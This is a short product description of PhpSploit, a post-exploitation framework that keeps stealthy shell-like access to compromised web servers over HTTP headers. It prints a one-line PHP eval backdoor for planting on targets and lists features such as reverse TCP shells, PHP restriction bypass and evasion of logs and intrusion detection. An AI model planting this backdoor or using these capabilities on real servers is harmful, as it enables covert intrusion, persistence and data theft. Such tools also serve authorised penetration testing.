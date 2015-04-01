PhpSploit - Furtive Post-Exploitation Framework
PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server.
It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.
The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
Features:
- Efficient: More than 20 plugins to automate post-exploitation tasks
- Run commands and browse filesystem, bypassing PHP security restrictions
- Upload/Download files between client and target
- Edit remote files through local text editor
- Run SQL console on target system
- Spawn reverse TCP shells
- Stealth: The framework is made by paranoids, for paranoids
- Nearly invisible by log analysis and NIDS signature detection
- Safe-mode and common PHP security restrictions bypass
- Communications are hidden in HTTP Headers
- Loaded payloads are obfuscated to bypass NIDS
- http/https/socks4/socks5 Proxy support
- Convenient: A robust interface with many crucial features
- Detailed help for any command or option (type help)
- Cross-platform on both the client and the server.
- Powerful interface with completion and multi-command support
- Session saving/loading feature & persistent history
- Multi-request support for large payloads (such as uploads)
- Provides a powerful, highly configurable settings engine
- Each setting, such as user-agent has a polymorphic mode
- Customisable environment variables for plugin interaction
- Provides a complete plugin development API
Supported Platforms (as attacker):
- GNU/Linux
- Mac OS X
Supported Platforms (as target):
- GNU/Linux
- BSD Like
- Mac OS X
- Windows NT
